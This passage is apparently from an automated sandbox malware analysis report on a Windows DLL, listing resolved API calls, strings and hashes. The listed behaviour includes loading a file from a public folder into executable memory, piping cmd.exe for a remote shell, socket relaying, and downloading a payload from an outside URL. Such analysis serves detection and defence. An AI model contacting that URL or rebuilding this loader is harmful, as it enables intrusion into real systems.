                                                  • #2784.MFC42(100FB4F0,100FA644), ref: 10011B8E
                                                  • #6662.MFC42(00000022,00000001,100FB4F0,100FA644), ref: 10011BB7
                                                  • #4278.MFC42(00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BD6
                                                  • #858.MFC42(00000000,00000030,00000001,00000000,00000022,00000001,100FB4F0,100FA644), ref: 10011BE5
                                                  • #4129.MFC42(?,00000000,100FB4F0,100FA644), ref: 10011C8B
                                                  • #858.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011C98
                                                  • #800.MFC42(00000000,?,00000000,100FB4F0,100FA644), ref: 10011CA6
                                                  • #535.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CC2
                                                  • #858.MFC42(00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011CFA
                                                  • #858.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D07
                                                  • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D10
                                                  • #2614.MFC42(00000022,00000022,?,000000FF,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D19
                                                  • #5710.MFC42(?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D32
                                                  • #858.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D41
                                                  • #800.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D4F
                                                  • #6282.MFC42(00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D58
                                                  • #2784.MFC42(100FB4F0,00000000,?,?,00000000,?,00000000,100FB4F0,100FA644), ref: 10011D66
                                                  • #535.MFC42(?,?,100FB4F0,100FA644), ref: 10011D8D
                                                  • #858.MFC42(00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DC5
                                                  • #858.MFC42(00000022,00000022,?,000000FF,?,?,100FB4F0,100FA644), ref: 10011DD2
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011DE8
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011DF6
                                                  • #800.MFC42(100FB4F0,100FA644), ref: 10011E07
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #858$#800$#535$#2614#2784#540#6282$#4129#4278#5710#6283#6662#941
                                                  • String ID: /
                                                  • API String ID: 2746067309-2043925204
                                                  • Opcode ID: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                  • Instruction ID: 26f83c008789524febe6ecc07bb2f6c57f414736253c4046dad23ffb5fd3ab93
                                                  • Opcode Fuzzy Hash: 0da93068c975a70c7a6139256a48672d71f2cdb22226152c638404c253ca3162
                                                  • Instruction Fuzzy Hash: 9F91B175008385AFC344DF64D591EABF7E5EF98214F804A1CF4A657292EB30FA49CB92
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,SetEvent), ref: 10001717
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001720
                                                  • LoadLibraryA.KERNEL32 ref: 10001792
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001795
                                                  • LoadLibraryA.KERNEL32(user32.dll,GetMessageA), ref: 100017A5
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017A8
                                                  • LoadLibraryA.KERNEL32(WINMM.dll,waveInAddBuffer), ref: 100017B6
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017B9
                                                  • LoadLibraryA.KERNEL32(USER32.dll,TranslateMessage), ref: 100017C9
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017CC
                                                  • LoadLibraryA.KERNEL32(USER32.dll,DispatchMessageA), ref: 100017DC
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100017DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: DispatchMessageA$F$GetMessageA$KERNEL32.dll$O$S$SetEvent$TranslateMessage$USER32.dll$W$WINMM.dll$a$b$c$g$j$l$n$o$r$user32.dll$waveInAddBuffer
                                                  • API String ID: 2574300362-3155383694
                                                  • Opcode ID: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                  • Instruction ID: ccfd42d412a131656b4a3d3b70f2aa919a29a5acdd925cac9141545cb71d5cde
                                                  • Opcode Fuzzy Hash: 7e8f983e9651bb8cb031b777cd2917f1a46b555af6ce2a16da49d6b9aa20f874
                                                  • Instruction Fuzzy Hash: 4341C06050C384AAE310DBB98C48B8BBFD8AFD6758F040A1DF5C497281C679D648CB77
                                                  APIs
                                                    • Part of subcall function 1001B660: GetModuleHandleA.KERNEL32(?,755683C0,1001F1D6), ref: 1001B666
                                                    • Part of subcall function 1001B660: LoadLibraryA.KERNEL32(?), ref: 1001B671
                                                    • Part of subcall function 1001B660: GetProcAddress.KERNEL32(00000000,?), ref: 1001B681
                                                  • CloseHandle.KERNEL32(00000000), ref: 1001EA4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Handle$AddressCloseLibraryLoadModuleProc
                                                  • String ID: .$2$3$C$F$F$G$K$L$N$P$R$S$W$a$d$i$i$i$i$i$l$l$l$l$l$n$o$r$r$r$t$t$t$t$z
                                                  • API String ID: 1380958172-3142711299
                                                  • Opcode ID: ee90e264bc5d62a42489c88669f886a09d5ee129677a9a2e2aed8f7aaea50efa
                                                  • Instruction ID: 696425c67723a87576a0cc16c5867392c1d34f4365c322855185195348325f3b
                                                  • Opcode Fuzzy Hash: ee90e264bc5d62a42489c88669f886a09d5ee129677a9a2e2aed8f7aaea50efa
                                                  • Instruction Fuzzy Hash: 5E71252114C3C0DDE342C6A88888B5FFFD55BA6748F48499DF2C85B292D2FA9548C77B
                                                  APIs
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C4A
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C5D
                                                  • ?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF,?,10021131), ref: 10020C7A
                                                  • ?_Eos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEXI@Z.MSVCP60(?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CA0
                                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(1011FA14,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020CDD
                                                  • CreateFileA.KERNEL32(C:\Users\Public\Documents\MM\4.txt,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00000001,?,00000000), ref: 10020D06
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D1A
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00001000,00000040,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000), ref: 10020D35
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000001,?,00000000), ref: 10020D51
                                                  • CloseHandle.KERNEL32(00000000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D69
                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42), ref: 10020D81
                                                  • Sleep.KERNEL32(000007D0,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020D8E
                                                  • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DB0
                                                  • #825.MFC42(?,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020DE3
                                                  • MessageBoxA.USER32(00000000,1011F9D8,1011F9E8,00000000), ref: 10020E05
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E14
                                                  • ?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,?,00000001,?,00000000,?,?,?,?,?,?,00000000,10098C42,000000FF), ref: 10020E26
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@$File$#825Virtual$?find@?$basic_string@AllocCloseCreateEos@?$basic_string@FreeGrow@?$basic_string@HandleMessageReadSizeSleep
                                                  • String ID: C:\Users\Public\Documents\MM\4.txt$schtasks /Query /TN MM
                                                  • API String ID: 954268177-2491561334
                                                  • Opcode ID: 1ff5adcc3b13ce8133206020c1749af2d6b1b4d41c1780870a0bcc4895dea406
                                                  • Instruction ID: eee99fee9f34857cce5813bf56fbbaab41e91e05ea10bfdddcd6c1257e282fc6
                                                  • Opcode Fuzzy Hash: 1ff5adcc3b13ce8133206020c1749af2d6b1b4d41c1780870a0bcc4895dea406
                                                  • Instruction Fuzzy Hash: 6B910235A01358ABEB14CBA4DC89BEDBBB5EF19710F580259F80AB72C2C7751A41CB61
                                                  APIs
                                                    • Part of subcall function 100109B0: LoadLibraryA.KERNEL32(KERNEL32.dll,CreateEventA,?,?,1000F32E,?,?,00000000,1001DC8E,?,100FA3E4,?), ref: 100109D0
                                                    • Part of subcall function 100109B0: GetProcAddress.KERNEL32(00000000), ref: 100109D7
                                                  • LoadLibraryA.KERNEL32 ref: 1002176D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021776
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetSystemDirectoryA), ref: 10021786
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10021789
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreatePipe), ref: 10021799
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002179C
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetStartupInfoA), ref: 100217AC
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100217AF
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,CreateProcessA), ref: 100217BF
                                                  • GetProcAddress.KERNEL32(00000000), ref: 100217C2
                                                  • WaitForInputIdle.USER32(?,000000FF), ref: 10021998
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$IdleInputWait
                                                  • String ID: C$CreatePipe$CreateProcessA$D$GetStartupInfoA$GetSystemDirectoryA$H$KERNEL32.dll$\cmd.exe$a$dnaH$n$o$s$x32$x64
                                                  • API String ID: 2019908028-49846795
                                                  • Opcode ID: ce84df58b7b6a488c50ae0de7624002763e034ac238bc98047c6de92e255ee04
                                                  • Instruction ID: 92f248a0eebfd2599b3cf5bc321e4dec982d7722fd2a173f039d14557fa12c24
                                                  • Opcode Fuzzy Hash: ce84df58b7b6a488c50ae0de7624002763e034ac238bc98047c6de92e255ee04
                                                  • Instruction Fuzzy Hash: 05C1AD75608384AFC724CF28C880BDBBBE5EFD9710F50492DF5889B280DB749945CB96
                                                  APIs
                                                  • CoInitialize.OLE32 ref: 1002AED3
                                                  • CoCreateInstance.OLE32(100B7A14,00000000,00000001,100B7A34,?), ref: 1002AEEC
                                                  • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AEFB
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AF92
                                                  • #823.MFC42(00000000), ref: 1002AFA5
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFC0
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002AFDD
                                                  • #823.MFC42(00000000), ref: 1002AFED
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 1002B008
                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 1002B016
                                                  • wsprintfA.USER32 ref: 1002B066
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B070
                                                  • lstrlenA.KERNEL32(?), ref: 1002B079
                                                  • lstrlenA.KERNEL32(?), ref: 1002B082
                                                  • LocalSize.KERNEL32(?), ref: 1002B094
                                                  • LocalReAlloc.KERNEL32(?,00000000,00000042), ref: 1002B0A2
                                                  • lstrlenA.KERNEL32(?), ref: 1002B0B1
                                                  • lstrlenA.KERNEL32(?), ref: 1002B0D8
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B0E7
                                                  • lstrlenA.KERNEL32(00000000), ref: 1002B103
                                                  • lstrlenA.KERNEL32(?), ref: 1002B116
                                                  • lstrlenA.KERNEL32(?), ref: 1002B134
                                                  • #825.MFC42(00000000), ref: 1002B17B
                                                  • #825.MFC42(?), ref: 1002B1C0
                                                  • CoUninitialize.OLE32 ref: 1002B1F5
                                                  • LocalReAlloc.KERNEL32(00000000,00000001,00000042), ref: 1002B203
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrlen$ByteCharLocalMultiWide$Alloc$#823#825Time$CreateFileInitializeInstanceSizeSystemUninitializewsprintf
                                                  • String ID: %d-%d-%d %d:%d:%d
                                                  • API String ID: 1491319390-2068262593
                                                  • Opcode ID: 27e75279608e98eea4302a7bf493d0ea2090c819ab884ec49446e4557a7d0828
                                                  • Instruction ID: 209b5a1a77a50804524a6c14720c253af11b3270fcac6344b3acf558e8b2e5ca
                                                  • Opcode Fuzzy Hash: 27e75279608e98eea4302a7bf493d0ea2090c819ab884ec49446e4557a7d0828
                                                  • Instruction Fuzzy Hash: C6A1D171248302ABD310CF24DC95F6BB7E9EFC9700F944A2CF995A7391DA35E8098792
                                                  APIs
                                                  • EnterCriticalSection.KERNEL32(1012C4C8), ref: 1002371C
                                                  • LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10023734
                                                  • malloc.MSVCRT ref: 1002374D
                                                  • malloc.MSVCRT ref: 10023756
                                                  • malloc.MSVCRT ref: 1002375F
                                                  • recv.WS2_32 ref: 100237C6
                                                  • send.WS2_32 ref: 10023846
                                                  • getpeername.WS2_32(?,?,?), ref: 1002387B
                                                  • inet_addr.WS2_32(00000000), ref: 10023888
                                                  • inet_addr.WS2_32(00000000), ref: 100238A2
                                                  • htons.WS2_32(?), ref: 100238AD
                                                  • send.WS2_32 ref: 100238EF
                                                  • CreateThread.KERNEL32(00000000,00000000,10023D00,?,00000000,?), ref: 1002392E
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1002393F
                                                    • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                    • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                    • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                    • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                    • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                    • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                  • send.WS2_32(?,?,00000008,00000000), ref: 10023990
                                                  • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 100239BD
                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00000008,00000000), ref: 100239CA
                                                    • Part of subcall function 100232C0: gethostbyname.WS2_32(?), ref: 100232C5
                                                  • closesocket.WS2_32(00000000), ref: 100239D9
                                                  • closesocket.WS2_32(?), ref: 100239DF
                                                  • free.MSVCRT ref: 100239E8
                                                  • free.MSVCRT ref: 100239EB
                                                  • free.MSVCRT ref: 100239F2
                                                  • free.MSVCRT ref: 100239F5
                                                    • Part of subcall function 10022E40: EnterCriticalSection.KERNEL32(1012C4C8), ref: 10022E6A
                                                    • Part of subcall function 10022E40: LeaveCriticalSection.KERNEL32(1012C4C8), ref: 10022E82
                                                    • Part of subcall function 10022E40: send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                    • Part of subcall function 10022E40: CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                    • Part of subcall function 10022E40: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSectionfreeinet_addrsend$CreateObjectSingleThreadWaitclosesocketmalloc$EnterLeavehtons$connectgethostbynamegetpeernamerecvsetsockoptsocket
                                                  • String ID: [
                                                  • API String ID: 3942976521-784033777
                                                  • Opcode ID: d7d33f5bb2a8c6a7b3589d6817ef937f63f56efa85a12ad83d1bc82f9d9e6c5c
                                                  • Instruction ID: 05d794b11b0cc2ecf4f84af8a3101db29113959690cf5300897258d7978ea0c0
                                                  • Opcode Fuzzy Hash: d7d33f5bb2a8c6a7b3589d6817ef937f63f56efa85a12ad83d1bc82f9d9e6c5c
                                                  • Instruction Fuzzy Hash: 7F81F270608344AFE310DB68DC85B5BBBE8EFC5754F548A1EF58983390E7B1E8448B62
                                                  APIs
                                                  • InternetOpenA.WININET(DownloadApp,00000001,00000000,00000000,00000000), ref: 1002082B
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011F980,?,?,1002128D,?,00000001,?,?,00000001), ref: 10020846
                                                  • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,80000000,00000000), ref: 10020871
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(6D14A3D8,1011F970,?,?,?,1002128D,?,00000001,?,?,00000001), ref: 1002088A
                                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(00000000,?,00000001), ref: 10020894
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 1002089A
                                                  • InternetCloseHandle.WININET(00000000), ref: 100208A4
                                                  • ?endl@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@1@AAV21@@Z.MSVCP60(00000000,00000000,?,00000001), ref: 100209B0
                                                  Strings
                                                  • DownloadApp, xrefs: 10020826
                                                  • https://fs-im-kefu.7moor-fs1.com/ly/4d2c3f00-7d4c-11e5-af15-41bf63ae4ea0/1723729291433/7.txt, xrefs: 1002081D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: U?$char_traits@$V?$basic_ostream@$??6std@@D@std@@@0@InternetV10@$?endl@std@@D@std@@@1@OpenV21@@$CloseD@2@@0@@D@std@@HandleV?$allocator@V?$basic_string@
